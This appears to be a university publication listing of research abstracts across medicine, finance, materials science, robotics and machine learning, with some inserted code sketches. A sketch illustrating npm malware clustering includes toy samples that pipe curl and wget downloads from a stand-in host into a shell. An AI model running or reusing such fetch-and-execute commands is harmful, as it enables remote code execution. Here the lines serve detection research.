Methods: Between January 2020 and October 2021, 27 athletes of the German Olympic centre Rhineland with confirmed Covid-19 infection were analyzed. Nine healthy non-athlete volunteers served as controls. CMR was performed on average 182 days (SD 99) after the initial positive test result.
Results: CMR did not reveal any signs of acute myocarditis with regard to the current Lake Louise criteria, nor any myocardial damage, in any of the 26 elite athletes with previous Covid-19 infection. Nevertheless, 92% of the athletes experienced a symptomatic course and 54% reported symptoms lasting for more than 4 weeks. In one male athlete, CMR revealed an arrhythmogenic right ventricular cardiomyopathy (ARVC), and this athlete was excluded from the study. Athletes had significantly enlarged left and right ventricular volumes and increased left ventricular myocardial mass compared to the healthy control group (LVEDVi 103.4 vs. 91.1 ml/m², p = 0.031; RVEDVi 104.1 vs. 86.6 ml/m², p = 0.007; LVMi 59.0 vs. 46.2 g/m², p = 0.002).
Conclusion: Our findings suggest that the risk of mid- to long-term myocardial damage is very low to negligible in elite athletes. No conclusions can be drawn regarding myocardial injury in the acute phase of infection or about possible long-term myocardial effects in the general population.
Despite the increasing interest in single family offices (SFOs) as an investment owned by an entrepreneurial family, research on SFOs is still in its infancy. In particular, little is known about the capital structures of SFOs or the roots of SFO heterogeneity regarding financial decisions. By drawing on a hand-collected sample of 104 SFOs and private equity (PE) firms, we compare the financing choices of these two investor types in the context of direct entrepreneurial investments (DEIs). Our data thereby provide empirical evidence that SFOs are less likely to raise debt than PE firms, suggesting that SFOs follow pecking-order theory. Regarding the heterogeneity of the financial decisions of SFOs, our data indicate that the relationship between SFOs and debt financing is reinforced by the idiosyncrasies of entrepreneurial families, such as higher levels of owner management and a higher firm age. Surprisingly, our data do not support a moderating effect for the emphasis placed on socioemotional wealth (SEW).
A main factor hampering life in space is represented by high atomic number and energy (HZE) ions, which constitute about 1% of the galactic cosmic rays. In the frame of the “STARLIFE” project, we accessed the Heavy Ion Medical Accelerator (HIMAC) facility of the National Institute of Radiological Sciences (NIRS) in Chiba, Japan. By means of this facility, the extremophilic species Haloterrigena hispanica and Parageobacillus thermantarcticus were irradiated with high-LET ions (i.e., Fe, Ar, and He ions) at doses corresponding to a long permanence in the space environment. The survivability of HZE-treated cells depended on both the storage time and the hydration state during irradiation; indeed, dry samples were shown to be more resistant than hydrated ones. With particular regard to spores of the species P. thermantarcticus, they were the most resistant to irradiation in a water medium: an analysis of the changes in their biochemical fingerprinting during irradiation showed that, below the survivability threshold, the spores undergo a germination-like process, while for higher doses, inactivation takes place as a consequence of the concomitant release of the core’s content and a loss of integrity of the main cellular components. Overall, the results reported here suggest that the selected extremophilic microorganisms could serve as biological models for space simulation and/or real space condition exposure, since they showed good resistance to ionizing radiation exposure and were able to resume cellular growth after long-term storage.
How self-reliant Peer Teaching can be set up to augment learning outcomes for university learners
(2022)
Modeling of Creep Behavior of Particulate Composites with Focus on Interfacial Adhesion Effect
(2022)
Evaluation of the creep compliance of particulate composites using empirical models always yields parameters that depend on the initial stress and the material composition, and efforts to connect the model parameters with physical properties have not yet been successful. Furthermore, during creep, delamination between matrix and filler may occur depending on time and initial stress, reducing the interface adhesion and the load transfer to the filler particles. In this paper, the creep compliance curves of glass-bead-reinforced poly(butylene terephthalate) composites were fitted with the Burgers and Findley models, providing different sets of time-dependent model parameters for each initial stress. While the Findley model performs well in primary creep and the Burgers model is more suitable once secondary creep comes into play, both allow only for a qualitative prediction of creep behavior because the interface adhesion and its time dependence is an implicit, hidden parameter. As Young’s modulus is a parameter of these models (and of the majority of other creep models), it was selected to be introduced as a filler-content-dependent parameter with the help of the cube-in-cube elementary volume approach of Paul. The analysis led to a time-dependent creep compliance that depends only on the time-dependent creep of the matrix and the normalized particle distance (or the filler volume content), and it allowed accounting for the adhesion effect. Comparison with the experimental data confirmed that the elementary-volume-based creep compliance function can be used to predict the realistic creep behavior of particulate composites.
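For orientation, the two empirical creep models named above are commonly written in the following textbook form for the strain under a constant initial stress σ₀ (the creep compliance follows as J(t) = ε(t)/σ₀); the exact parameterisation used in the paper may differ.

```latex
% Findley power law (describes primary creep)
\varepsilon(t) = \varepsilon_0 + A\, t^{n}

% Burgers (four-element) model under constant stress \sigma_0
\varepsilon(t) = \sigma_0 \left[ \frac{1}{E_1} + \frac{t}{\eta_1}
               + \frac{1}{E_2}\left(1 - e^{-t E_2/\eta_2}\right) \right]
```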
The cube in cube approach was used by Paul and Ishai-Cohen to model and derive formulas for the filler-content-dependent Young's moduli of particle-filled composites assuming perfect filler-matrix adhesion. Their formulas were chosen because of their simplicity, and recalculated using an elementary volume approach which transforms spherical inclusions into cubic inclusions. The EV approach led to an expression for the composite's modulus that allows introducing an adhesion factor kadh ranging from 0 to 1 to take reduced filler-matrix adhesion into account. This adhesion factor scales the edge length of the cubic inclusions, thus reducing the stress transfer area between matrix and filler. Fitting the experimental data with the modified Paul model provides reasonable kadh for PA66, PBT, PP, PE-LD and BR which are in line with their surface energies. Further analysis showed that stiffening only occurs if kadh exceeds √(EM/EF), i.e. it depends on the ratio of matrix modulus and filler modulus. The modified model allows for a quick calculation of any particle-filled composite for known matrix modulus EM, filler modulus EF, filler volume content vF and adhesion factor kadh. Thus, finite element analysis (FEA) simulations of any particle-filled polymer parts as well as materials selection are significantly eased. FEA of cubic and hexagonal EV arrangements shows that stress distributions within the EV exhibit more shear stresses if one deviates from the cubic arrangement. At high filler contents, the assumption that the property of the EV is representative of the whole composite holds only for filler volume contents up to 15 or 20% (corresponding to 30 to 40 wt%). Thus, for the vast majority of commercially available particulate composites, the modified model can be applied. Furthermore, this indicates that the cube in cube approach reaches two limits: (i) the occurrence of increasing shear stresses at filler contents above 20% due to deviations of EV arrangements or of the spatial filler distribution from cubic arrangements (singular), and (ii) increasing interaction between particles with the formation of a particle network within the matrix, violating the EV assumption of their homogeneous dispersion.
Introduction of Matrix-Filler Adhesion to Modelling of Elastic Moduli of Particulate Composites
(2022)
The cube-in-cube elementary volume (EV) concept serves to predict the filler-content-dependent Young's modulus of particle-filled composites using the moduli of the matrix, EM, and of the filler, EF. Paul and Ishai-Cohen derived formulas for the composite moduli considering different load transfer boundaries in the EV, assuming complete filler-matrix adhesion. In this paper it is confirmed that their models represent the upper and lower bounds, respectively, with respect to the experimental data. However, in the vast majority of composites the filler-matrix adhesion is not complete. Therefore, an adhesion factor kadh taking values between 0 and 1 was introduced into Paul's model to describe the reduced adhesion as a reduction of the filler-matrix contact area for glass beads embedded in polar and nonpolar thermoplastic matrices as well as in an elastomer. The evaluation of these composite systems provides reasonable adhesion coefficients in the order PA66 > PBT > PP > PE-LD >> BR. It was also found that stiffening only occurs if kadh exceeds the minimum value √(EM/EF). The determined kadh values correspond to scanning electron microscopy observations of the composites' fracture surfaces. Additionally, finite element analysis of the cubic and hexagonal arrangements of the EV shows that the stress distributions are different, but they affect the calculated moduli only for filler volume contents exceeding 20%. The introduction of the filler-matrix adhesion provides more reliable predictions of the Young's moduli of particulate composites.
The cube in cube approach was used by Paul and Ishai-Cohen to model and derive formulas for the filler-content-dependent Young's moduli of particle-filled composites assuming perfect filler-matrix adhesion. Their formulas were chosen because of their simplicity and recalculated using an elementary volume approach which transforms spherical inclusions into cubic inclusions. The EV approach led to an expression for the composite's modulus that allows for introducing an adhesion factor kadh ranging from 0 to 1 to take non-perfect (reduced) filler-matrix adhesion into account. This adhesion factor scales the edge length of the cubic inclusions, thus reducing the stress transfer area between matrix and filler. Fitting the experimental data with the modified Paul model provides reasonable kadh for PA66, PBT, PP, PE-LD and BR which are in line with their surface energies. Further analysis showed that stiffening only occurs if kadh exceeds √(EM/EF), i.e. it depends on the ratio of matrix modulus and filler modulus. The modified model allows for a quick calculation of any particle-filled composite for known matrix modulus EM, filler modulus EF, filler volume content vF and adhesion factor kadh. Thus, finite element analysis (FEA) simulations of any particle-filled polymer parts as well as materials selection are significantly eased. FEA of cubic and hexagonal EV arrangements shows that stress distributions within the EV exhibit more shear stresses if one deviates from the cubic arrangement. At high filler contents, the assumption that the property of the EV is representative of the whole composite holds only for filler volume contents up to 15 or 20% (corresponding to 30 to 40 wt%). Thus, for the vast majority of commercially available particulate composites, the modified model can be applied. Furthermore, this indicates that the cube in cube approach reaches two limits: (i) the occurrence of increasing shear stresses at filler contents above 20% due to deviations of EV arrangements or of the spatial filler distribution from cubic arrangements (singular), and (ii) increasing interaction between particles with the formation of a particle network within the matrix, violating the EV assumption of their homogeneous dispersion.
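As a quick numerical illustration of the stiffening criterion stated in the preceding abstracts, the sketch below checks kadh > √(EM/EF) for hypothetical moduli of a thermoplastic matrix and glass-bead filler; the values are examples, not data from the papers.

```python
import math

def stiffening_possible(E_matrix_GPa: float, E_filler_GPa: float, k_adh: float) -> bool:
    """Stiffening criterion from the abstracts above: the filler only stiffens the
    composite if the adhesion factor exceeds sqrt(E_M / E_F)."""
    return k_adh > math.sqrt(E_matrix_GPa / E_filler_GPa)

# Hypothetical values: a thermoplastic matrix (~2 GPa) filled with glass beads (~70 GPa).
for k_adh in (0.05, 0.17, 0.5, 1.0):
    print(k_adh, stiffening_possible(2.0, 70.0, k_adh))
# sqrt(2/70) is roughly 0.17, so only the larger adhesion factors lead to stiffening.
```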
Robots applied in therapeutic scenarios, for instance in the therapy of individuals with Autism Spectrum Disorder, are sometimes used for imitation learning activities in which a person needs to repeat motions performed by the robot. To simplify the task of incorporating new types of motions that a robot can perform, it is desirable that the robot has the ability to learn motions by observing demonstrations from a human, such as a therapist. In this paper, we investigate an approach for acquiring motions from skeleton observations of a human, which are collected by a robot-centric RGB-D camera. Given a sequence of observations of various joints, the joint positions are mapped to match the configuration of the robot before being executed by a PID position controller. We evaluate the method, in particular the reproduction error, by performing a study with QTrobot in which the robot acquired different upper-body dance moves from multiple participants. The results indicate the method's overall feasibility, but also show that the reproduction quality is affected by noise in the skeleton observations.
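To illustrate the general idea of mapping observed skeleton keypoints to a joint target and tracking it with a PID position controller, here is a minimal sketch. The toy joint mapping, the controller gains, and the crude plant model are assumptions for illustration; they are not QTrobot's actual kinematics or control interface.

```python
import numpy as np

class PIDPositionController:
    """Simple per-joint PID controller (illustrative; gains are placeholders)."""
    def __init__(self, kp=2.0, ki=0.1, kd=0.05, dt=0.02):
        self.kp, self.ki, self.kd, self.dt = kp, ki, kd, dt
        self.integral = 0.0
        self.prev_error = 0.0

    def update(self, target, current):
        error = target - current
        self.integral += error * self.dt
        derivative = (error - self.prev_error) / self.dt
        self.prev_error = error
        return self.kp * error + self.ki * self.integral + self.kd * derivative

def shoulder_pitch_from_skeleton(shoulder_xyz, elbow_xyz):
    # Toy mapping: derive one joint angle from two observed skeleton keypoints.
    v = np.asarray(elbow_xyz) - np.asarray(shoulder_xyz)
    return float(np.arctan2(v[2], v[0]))   # angle in a single plane (simplified)

controller = PIDPositionController()
current_angle = 0.0
target_angle = shoulder_pitch_from_skeleton((0.0, 0.0, 1.4), (0.2, 0.0, 1.2))
for _ in range(100):                          # control loop at 50 Hz
    command = controller.update(target_angle, current_angle)
    current_angle += command * controller.dt  # crude plant model, just for the sketch
```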
Self-supervised learning has proved to be a powerful approach to learn image representations without the need for large labeled datasets. For underwater robotics, it is of great interest to design computer vision algorithms that improve perception capabilities such as sonar image classification. Due to the confidential nature of sonar imaging and the difficulty of interpreting sonar images, it is challenging to create large public labeled sonar datasets to train supervised learning algorithms. In this work, we investigate the potential of three self-supervised learning methods (RotNet, Denoising Autoencoders, and Jigsaw) to learn high-quality sonar image representations without the need for human labels. We present pre-training and transfer learning results on real-life sonar image datasets. Our results indicate that self-supervised pre-training yields classification performance comparable to supervised pre-training in a few-shot transfer learning setup across all three methods. Code and self-supervised pre-trained models are available at https://github.com/agrija9/ssl-sonar-images
High-dimensional and multi-variate data from dynamical systems such as turbulent flows and wind turbines can be analyzed with deep learning due to its capacity to learn representations in lower-dimensional manifolds. Two challenges of interest arise from data generated from these systems, namely, how to anticipate wind turbine failures and how to better understand air flow through car ventilation systems. There are deep neural network architectures that can project data into a lower-dimensional space with the goal of identifying and understanding patterns that are not distinguishable in the original dimensional space. Learning data representations in lower dimensions via non-linear mappings allows one to perform data compression, data clustering (for anomaly detection), data reconstruction and synthetic data generation.
In this work, we explore the potential of variational autoencoders (VAE) to learn low-dimensional data representations in order to tackle the problems posed by the two dynamical systems mentioned above. A VAE is a neural network architecture that combines the mechanisms of the standard autoencoder and variational Bayes. The goal here is to train a neural network to minimize a loss function defined by a reconstruction term together with a variational term defined as a Kullback-Leibler (KL) divergence.
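The following is a minimal PyTorch sketch of exactly this loss, a reconstruction term plus a KL divergence, on a toy fully-connected VAE. It is illustrative only; layer sizes are arbitrary, and it is not the VRAE or CVAE architectures used later in the report.

```python
import torch
import torch.nn as nn
import torch.nn.functional as F

class TinyVAE(nn.Module):
    """Minimal fully-connected VAE used only to illustrate the loss described above."""
    def __init__(self, in_dim=64, latent_dim=8):
        super().__init__()
        self.enc = nn.Linear(in_dim, 32)
        self.mu = nn.Linear(32, latent_dim)
        self.logvar = nn.Linear(32, latent_dim)
        self.dec = nn.Sequential(nn.Linear(latent_dim, 32), nn.ReLU(), nn.Linear(32, in_dim))

    def forward(self, x):
        h = torch.relu(self.enc(x))
        mu, logvar = self.mu(h), self.logvar(h)
        z = mu + torch.randn_like(mu) * torch.exp(0.5 * logvar)   # reparameterisation trick
        return self.dec(z), mu, logvar

def vae_loss(x, x_hat, mu, logvar):
    recon = F.mse_loss(x_hat, x, reduction="sum")                 # reconstruction term
    kl = -0.5 * torch.sum(1 + logvar - mu.pow(2) - logvar.exp())  # KL(q(z|x) || N(0, I))
    return recon + kl

model = TinyVAE()
x = torch.randn(16, 64)                                           # dummy batch
x_hat, mu, logvar = model(x)
loss = vae_loss(x, x_hat, mu, logvar)
loss.backward()
```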
The report discusses the results obtained for the two different data domains: wind turbine time series and turbulence data from computational fluid dynamics (CFD) simulations.
We report on the reconstruction, clustering and unsupervised anomaly detection of wind turbine multi-variate time series data using a variant of a VAE called Variational Recurrent Autoencoder (VRAE). We trained a VRAE to cluster normal and abnormal wind turbine series (two-class problem) as well as normal and multiple abnormal series (multi-class problem). We found that the model is capable of distinguishing between normal and abnormal cases by reducing the dimensionality of the input data and projecting it to two dimensions using techniques such as Principal Component Analysis (PCA) and t-distributed stochastic neighbor embedding (t-SNE). A set of anomaly scoring methods is applied on top of these latent vectors in order to compute unsupervised clustering. We have achieved an accuracy of up to 96% with the KMeans++ algorithm.
We also report the data reconstruction and generation results for two-dimensional turbulence slices corresponding to a CFD simulation of an HVAC air duct. For this, we have trained a Convolutional Variational Autoencoder (CVAE). We have found that the model is capable of reconstructing laminar flows up to a certain degree of resolution as well as generating synthetic turbulence data from the learned latent distribution.
The Poverty Reduction Effect of Social Protection: The Pros and Cons of a Multidisciplinary Approach
(2022)
There is a growing body of knowledge on the complex effects of social protection on poverty in Africa. This article explores the pros and cons of a multidisciplinary approach to studying social protection policies. Our research aimed at studying the interaction between cash transfers and social health protection policies in terms of their impact on inclusive growth in Ghana and Kenya. It also explored the policy reform context over time to unravel programme dynamics and outcomes. The analysis combined econometric and qualitative impact assessments with national- and local-level political economic analyses. In particular, dynamic effects and an improved understanding of processes are well captured by this approach, thus pushing the understanding of implementation challenges over and beyond a ‘technological fix’, as has been argued before by Niño-Zarazúa et al. (World Dev 40:163–176, 2012). However, multidisciplinary research puts considerable demands on data and data handling. Finally, some poverty reduction effects play out over a longer time, requiring consistent longitudinal data that are still scarce.
TSEM: Temporally Weighted Spatiotemporal Explainable Neural Network for Multivariate Time Series
(2022)
Deep learning has become a one-size-fits-all solution for technical and business domains thanks to its flexibility and adaptability. It is, however, implemented using opaque models, which undermines the trustworthiness of the outcomes. In order to better understand the behavior of a system, particularly one driven by time series, a look inside a deep learning model via so-called post-hoc eXplainable Artificial Intelligence (XAI) approaches is important. There are two major types of XAI for time series data, namely model-agnostic and model-specific; a model-specific approach is considered in this work. While other approaches employ either Class Activation Mapping (CAM) or an Attention Mechanism, we merge the two strategies into a single system, called the Temporally Weighted Spatiotemporal Explainable Neural Network for Multivariate Time Series (TSEM). TSEM combines the capabilities of RNN and CNN models in such a way that the RNN hidden units are employed as attention weights for the temporal axis of the CNN feature maps. The results show that TSEM outperforms XCM. It is similar to STAM in terms of accuracy, while also satisfying a number of interpretability criteria, including causality, fidelity, and spatiotemporality.
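To make the described combination more tangible, here is a rough PyTorch sketch in which GRU hidden states are turned into softmax weights over the temporal axis of Conv1d feature maps. This is only a guess at the general mechanism, intended for illustration; it is not the published TSEM architecture, and all layer sizes are arbitrary.

```python
import torch
import torch.nn as nn

class TemporalAttentionSketch(nn.Module):
    """Illustrative sketch: RNN hidden states become per-time-step weights that are
    applied to CNN feature maps (a rough analogue of the idea described above)."""
    def __init__(self, n_vars=6, n_filters=32, hidden=16, n_classes=3):
        super().__init__()
        self.cnn = nn.Conv1d(n_vars, n_filters, kernel_size=3, padding=1)
        self.rnn = nn.GRU(n_vars, hidden, batch_first=True)
        self.attn = nn.Linear(hidden, 1)
        self.head = nn.Linear(n_filters, n_classes)

    def forward(self, x):                       # x: (batch, time, variables)
        feats = self.cnn(x.transpose(1, 2))     # (batch, filters, time)
        h, _ = self.rnn(x)                      # (batch, time, hidden)
        w = torch.softmax(self.attn(h), dim=1)  # (batch, time, 1) temporal weights
        weighted = feats * w.transpose(1, 2)    # weight the temporal axis of the feature maps
        return self.head(weighted.sum(dim=-1))  # pool over time and classify

logits = TemporalAttentionSketch()(torch.randn(4, 50, 6))  # dummy multivariate series
```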
Research-Practice-Collaborations Addressing One Health and Urban Transformation. A Case Study
(2022)
One Health is an integrative approach at the interface of humans, animals and the environment, which can be implemented as Research-Practice-Collaboration (RPC) for its interdisciplinarity and intersectoral focus on the co-production of knowledge. To exemplify this, the present commentary presents the example of the Forschungskolleg “One Health and Urban Transformation” funded by the Ministry of Culture and Science of the State of North Rhine-Westphalia in Germany. After analysis, the factors identified for a better implementation of RPC for One Health were the ones that allowed for constant communication and the reduction of power asymmetries between practitioners and academics in the co-production of knowledge. In this light, the training of a new generation of scientists at the boundaries of different disciplines who have mediation skills between academia and practice is an important contribution with great implications for societal change that can aid the further development of RPC.
This 2nd edition compendium contains and explains essential statistical formulas within an economic context. Expanded by more than 100 pages compared to the 1st edition, the compendium has been supplemented with numerous additional practical examples, which will help readers to better understand the formulas and their practical applications. This statistical formulary is presented in a practice-oriented, clear, and understandable manner, as it is needed for meaningful and relevant application in global business, as well as in the academic setting and economic practice. (Publisher's description)
The purpose of the study is to provide empirical evidence about the under-researched area of university–government relations in building a culture of entrepreneurial initiatives inside the triple helix model in a rural region. The study deploys a qualitative case study research method based on the content analysis of project documentation and further internal documents both from universities and municipalities. The propositions in the research question are guided by the previous literature and were then analyzed through an “open coding” process to iteratively analyze, verify, and validate the results from the documents against the previous literature. Results presented in the case study relate both to the project of a municipality–university innovation partnership and to the historic development of the university in its three missions, and, related to the important third mission, themes relevant for the project. In addition, a “toolkit” of relevant project activities is presented against the major identified themes, major project stakeholders, as well as relevant Sustainable Development Goals (SDGs). Universities should look beyond a purely economic contribution and should augment all three missions (teaching, research, engagement) by considering the social, environmental, and economic aspects of their activities. Instead of considering a government’s role solely as that of a regulator, a much more creative and purposeful cooperation between university and government is possible for creating a regional culture of entrepreneurial initiatives in a rural region.
Purpose: Both Hungary and Germany belong to the old-world wine-producing countries and have long winemaking traditions. This paper aims at exploring and comparing the online branding strategies of family SME (small and medium-sized enterprise) wineries at Lake Balaton (Hungary) and Lake Constance (Germany), two wine regions with similar geographic characteristics.
Design/methodology/approach: This paper, based on a total sample of 37 family wineries, 15 at Lake Balaton and 22 at Lake Constance, investigates the differences in brand identity on the website, brand image in social media and online communication channels deployed in both wine regions. The study applies a qualitative methodology using MaxQDA software for conducting content analysis of texts on websites and in social media. Descriptive statistics and a t-test were used to compare the usage of different communication channels and determine statistical significance.
Findings: At Lake Balaton, the vineyard, the winery and the family, while at Lake Constance, the lake itself and the grape are highlighted regarding family winery brand identity. The customer-based brand image of Hungarian family wineries emphasizes wine, food and service, with the predominant use of Facebook. In the German family wineries, the focus of brand identity is on wine, friendliness and taste and includes more extensive usage of websites.
Originality/value: The paper deploys a novel methodology, both in terms of tools used as well as geographic focus to uncover online branding patterns of family wineries, thereby providing implications for wine and tourism industries at lake regions. It compares the share of selected most-used words in the overall text in websites and in social media, and presents the key findings from this innovative approach.
The purpose of the study is to provide empirical evidence about the under-researched area of university–government relations in building a culture of entrepreneurial initiatives inside the triple helix model in a rural region. The study deploys a qualitative case study research method based on the content analysis of project documentation and further internal documents both from the university and the municipality.
State-of-the-art object detectors are treated as black boxes due to their highly non-linear internal computations. Even with unprecedented advancements in detector performance, the inability to explain how their outputs are generated limits their use in safety-critical applications. Previous work fails to produce explanations for both bounding box and classification decisions, and generally makes individual explanations for various detectors. In this paper, we propose an open-source Detector Explanation Toolkit (DExT) which implements the proposed approach to generate a holistic explanation for all detector decisions using certain gradient-based explanation methods. We suggest various multi-object visualization methods to merge the explanations of multiple objects detected in an image as well as the corresponding detections in a single image. The quantitative evaluation shows that the Single Shot MultiBox Detector (SSD) is more faithfully explained compared to other detectors regardless of the explanation methods. Both quantitative and human-centric evaluations identify that SmoothGrad with Guided Backpropagation (GBP) provides more trustworthy explanations among the selected methods across all detectors. We expect that DExT will motivate practitioners to evaluate object detectors from the interpretability perspective by explaining both bounding box and classification decisions.
As cameras are ubiquitous in autonomous systems, object detection is a crucial task. Object detectors are widely used in applications such as autonomous driving, healthcare, and robotics. Given an image, an object detector outputs both the bounding box coordinates as well as classification probabilities for each object detected. The state-of-the-art detectors are treated as black boxes due to their highly non-linear internal computations. Even with unprecedented advancements in detector performance, the inability to explain how their outputs are generated limits their use in safety-critical applications in particular. It is therefore crucial to explain the reason behind each detector decision in order to gain user trust, enhance detector performance, and analyze their failure.
Previous work fails to explain as well as evaluate both bounding box and classification decisions individually for various detectors. Moreover, no tools explain each detector decision, evaluate the explanations, and also identify the reasons for detector failures. This restricts the flexibility to analyze detectors. The main contribution presented here is an open-source Detector Explanation Toolkit (DExT). It is used to explain the detector decisions, evaluate the explanations, and analyze detector errors. The detector decisions are explained visually by highlighting the image pixels that most influence a particular decision. The toolkit implements the proposed approach to generate a holistic explanation for all detector decisions using certain gradient-based explanation methods. To the author’s knowledge, this is the first work to conduct extensive qualitative and novel quantitative evaluations of different explanation methods across various detectors. The qualitative evaluation incorporates a visual analysis of the explanations carried out by the author as well as a human-centric evaluation. The human-centric evaluation includes a user study to understand user trust in the explanations generated across various explanation methods for different detectors. Four multi-object visualization methods are provided to merge the explanations of multiple objects detected in an image as well as the corresponding detector outputs in a single image. Finally, DExT implements the procedure to analyze detector failures using the formulated approach.
The visual analysis illustrates that the ability to explain a model is more dependent on the model itself than the actual ability of the explanation method. In addition, the explanations are affected by the object explained, the decision explained, detector architecture, training data labels, and model parameters. The results of the quantitative evaluation show that the Single Shot MultiBox Detector (SSD) is more faithfully explained compared to other detectors regardless of the explanation methods. In addition, a single explanation method cannot generate more faithful explanations than other methods for both the bounding box and the classification decision across different detectors. Both the quantitative and human-centric evaluations identify that SmoothGrad with Guided Backpropagation (GBP) provides more trustworthy explanations among selected methods across all detectors. Finally, a convex polygon-based multi-object visualization method provides more human-understandable visualization than other methods.
The author expects that DExT will motivate practitioners to evaluate object detectors from the interpretability perspective by explaining both bounding box and classification decisions.
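As a pointer to what the gradient-based explanation methods discussed above involve in practice, below is a minimal SmoothGrad sketch that averages input gradients over noisy copies of an image. It uses plain gradients rather than Guided Backpropagation, and the tiny linear "model" is a placeholder, not one of the detectors evaluated with DExT.

```python
import torch

def smoothgrad(model, image, target_score_fn, n_samples=25, noise_std=0.1):
    """SmoothGrad sketch: average input gradients over noisy copies of the image.
    `target_score_fn` maps the model output to the scalar decision being explained
    (e.g. a class logit or a bounding-box coordinate)."""
    grads = torch.zeros_like(image)
    for _ in range(n_samples):
        noisy = (image + noise_std * torch.randn_like(image)).requires_grad_(True)
        score = target_score_fn(model(noisy))
        score.backward()
        grads += noisy.grad
    return grads / n_samples

# Usage with a dummy "detector": explain the sum of its outputs for a random image.
model = torch.nn.Sequential(torch.nn.Flatten(), torch.nn.Linear(3 * 32 * 32, 10))
saliency = smoothgrad(model, torch.randn(1, 3, 32, 32), lambda out: out.sum())
```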
Graph databases employ graph structures such as nodes, attributes and edges to model and store relationships among data. To access this data, graph query languages (GQL) such as Cypher are typically used, which may be difficult for end-users to master. In the context of relational databases, sequence-to-SQL models, which translate natural language questions into SQL queries, have been proposed. While these Neural Machine Translation (NMT) models increase the accessibility of relational databases, NMT models for graph databases are not yet available, mainly due to the lack of suitable parallel training data. In this short paper we sketch an architecture which enables the generation of synthetic training data for the graph query language Cypher.
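One common way to bootstrap such parallel data is template instantiation over a known graph schema; the toy sketch below pairs natural-language question templates with Cypher templates. The mini movie schema, templates and names are invented for illustration and do not represent the architecture proposed in the paper.

```python
import random

# Hypothetical mini-schema: (Person)-[:ACTED_IN]->(Movie). Both the schema and the
# question templates are invented for illustration only.
templates = [
    ("Which movies did {name} act in?",
     "MATCH (p:Person {{name: '{name}'}})-[:ACTED_IN]->(m:Movie) RETURN m.title"),
    ("How many movies did {name} act in?",
     "MATCH (p:Person {{name: '{name}'}})-[:ACTED_IN]->(m:Movie) RETURN count(m)"),
]
names = ["Alice Müller", "Bob Schmidt", "Carla Weber"]

def generate_pairs(n=10):
    """Instantiate (natural language question, Cypher query) training pairs."""
    pairs = []
    for _ in range(n):
        question_tpl, cypher_tpl = random.choice(templates)
        name = random.choice(names)
        pairs.append((question_tpl.format(name=name), cypher_tpl.format(name=name)))
    return pairs

for nl, cypher in generate_pairs(3):
    print(nl, "->", cypher)
```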
Trojanized software packages used in software supply chain attacks constitute an emerging threat. Unfortunately, there is still a lack of scalable approaches that allow automated and timely detection of malicious software packages, and thus most detections are based on manual labor and expertise. However, it has been observed that most attack campaigns comprise multiple packages that share the same or similar malicious code. We leverage that fact to automatically reproduce manually identified clusters of known malicious packages that have been used in real-world attacks, thus reducing the need for expert knowledge and manual inspection. Our approach, AST Clustering using MCL to mimic Expertise (ACME), yields promising results with an F1 score of 0.99. Signatures are automatically generated based on characteristic code fragments from the clusters and are subsequently used to scan the whole npm registry for unreported malicious packages. We were able to identify and report six malicious packages, which have consequently been removed from npm. Therefore, our approach can support detection by reducing manual labor and hence may be employed by maintainers of package repositories to detect possible software supply chain attacks through trojanized software packages.
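To give a feel for the kind of pipeline described above, the sketch below fingerprints Python sources by their AST node-type pairs and groups similar ones. It is only an analogy under simplifying assumptions: real npm packages are JavaScript, the similarity measure is a plain Jaccard index, and connected components over a threshold stand in for the MCL clustering that ACME actually uses.

```python
import ast
import itertools
import networkx as nx

def ast_fingerprint(source: str) -> set:
    """Very rough code fingerprint: the set of (parent, child) AST node-type pairs."""
    tree = ast.parse(source)
    pairs = set()
    for node in ast.walk(tree):
        for child in ast.iter_child_nodes(node):
            pairs.add((type(node).__name__, type(child).__name__))
    return pairs

def jaccard(a: set, b: set) -> float:
    return len(a & b) / len(a | b) if a | b else 0.0

# Toy "packages" whose payloads share similar structure (pkg_a and pkg_b).
snippets = {
    "pkg_a": "import os\nos.system('curl http://example.test | sh')",
    "pkg_b": "import os\nos.system('wget http://example.test -O- | sh')",
    "pkg_c": "def add(a, b):\n    return a + b",
}
graph = nx.Graph()
graph.add_nodes_from(snippets)
fps = {name: ast_fingerprint(src) for name, src in snippets.items()}
for x, y in itertools.combinations(snippets, 2):
    if jaccard(fps[x], fps[y]) > 0.8:          # similarity threshold (arbitrary)
        graph.add_edge(x, y)
print(list(nx.connected_components(graph)))    # pkg_a and pkg_b end up in one cluster
```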
The corporate landscape is experiencing an increasing change in business models due to digitization. The increasing availability of data along business processes enhances the opportunities for process automation. Technologies such as Robotic Process Automation (RPA) are widely used for business process optimization, but as a side effect an increase in stand-alone solutions and a lack of holistic approaches can be observed. Intelligent Process Automation (IPA) is said to support more complex processes and enable automated decision-making, but the lack of connectors makes its implementation difficult. RPA marketplaces can be a bridging technology to help companies implement Intelligent Process Automation. This paper explores the drivers and challenges for the adoption of RPA marketplaces to realize IPA. For this purpose, we conducted ten expert interviews with decision makers and IT staff from the process automation sector.
We benchmark the robustness of maximum-likelihood-based uncertainty estimation methods to outliers in training data for regression tasks. Outliers or noisy labels in training data result in degraded performance as well as incorrect estimation of uncertainty. We propose the use of a heavy-tailed distribution (the Laplace distribution) to improve the robustness to outliers. This property is evaluated using standard regression benchmarks and on a high-dimensional regression task of monocular depth estimation, both containing outliers. In particular, heavy-tailed-distribution-based maximum likelihood provides better uncertainty estimates, better separation in uncertainty for out-of-distribution data, as well as better detection of adversarial attacks in the presence of outliers.
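The core idea can be seen directly in the negative log-likelihoods: a minimal sketch, assuming a Laplace likelihood with learned location and scale, is shown below next to the Gaussian counterpart so that the reduced influence of a single outlier is visible. The toy numbers are illustrative, not taken from the paper's benchmarks.

```python
import torch

def laplace_nll(mu, log_b, y):
    """Laplace negative log-likelihood: log(2b) + |y - mu| / b with b = exp(log_b).
    The heavier tails penalise outliers less severely than the Gaussian NLL."""
    b = torch.exp(log_b)
    return (torch.log(2 * b) + torch.abs(y - mu) / b).mean()

def gaussian_nll(mu, log_sigma, y):
    """Gaussian negative log-likelihood (up to an additive constant)."""
    sigma = torch.exp(log_sigma)
    return (torch.log(sigma) + 0.5 * ((y - mu) / sigma) ** 2).mean()

# Toy comparison: one large outlier inflates the Gaussian NLL far more than the Laplace NLL.
y = torch.tensor([0.1, -0.2, 0.0, 8.0])
mu = torch.zeros(4)
log_scale = torch.zeros(4)       # log-scale 0 => scale 1
print(laplace_nll(mu, log_scale, y), gaussian_nll(mu, log_scale, y))
```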
